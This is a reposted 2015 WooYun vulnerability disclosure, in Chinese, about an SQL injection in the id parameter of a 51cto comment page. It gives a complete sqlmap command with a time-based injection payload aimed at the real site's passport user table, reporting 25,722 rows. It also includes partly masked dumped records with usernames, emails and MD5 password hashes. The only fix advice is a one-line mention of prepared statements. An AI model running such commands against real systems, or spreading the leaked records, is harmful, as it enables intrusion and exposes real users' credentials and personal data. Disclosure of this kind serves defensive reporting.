记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

51cto某站SQL注入2万用户信息泄露风险

2015-07-06 16:50

id参数存在sql注入。poc:



➜ sqlmap git:(master) ✗ python sqlmap.py -u "http://os.51cto.com/shtml/comment/bargraphsgoog.php?id=if(now()%3dsysdate()%2csleep(0)%2c0)" --random-agent --level 5 -D passport -T user



2w5用户



code 区域
25722

Database: passport

+--------+---------+

| Table | Entries |

+--------+---------+

| `user` | 25722 |

+--------+---------+

漏洞证明:

mask 区域
*****信*****

**********

*****abase: p*****

*****: u*****

*****tri*****

*****-------+---------+------------------+---------+------------------*****

***** | data | about | bcena | email *****

*****-------+---------+------------------+---------+------------------*****

1.://**.**.**//http:// | <blank> | ÎŢť°żÉËľ | <blank> | [email protected] | admin | żŐ | 1741277a62f84cdd28eab5640e69dbaf | blackdot |_

2.://**.**.**//www.rsschina.com.cn | <blank> | wo shi chinaren! | <blank> | [email protected] | chendeyong | haidianquşŁľíÇř | e10adc3949ba59abbe56e057f20f883e | cdy |_

***** | <blank> | [email protected] *****

*****[email protected] -+-*****

**********

*****abase: p*****

*****abl*****

*****-----*****

***** *****

***** *****

*****ersco*****

*****core *****

*****etag *****

***** *****

*****lass *****

***** *****

*****um *****

*****ime *****

*****te *****

*****nt *****

*****e *****

*****euser*****

***** *****

*****rnum *****

*****ss *****

*****ail *****

*****re1 *****

*****se *****

*****tail *****

*****a *****

*****orite*****

*****iew *****

*****re *****

*****ather*****

*****r *****

*****--+</*****

修复方案:

SQL注入的防御方法:采用预编译


知识来源: www.wooyun.org/bugs/wooyun-2015-0115416

阅读:169798 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“51cto某站SQL注入2万用户信息泄露风险”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云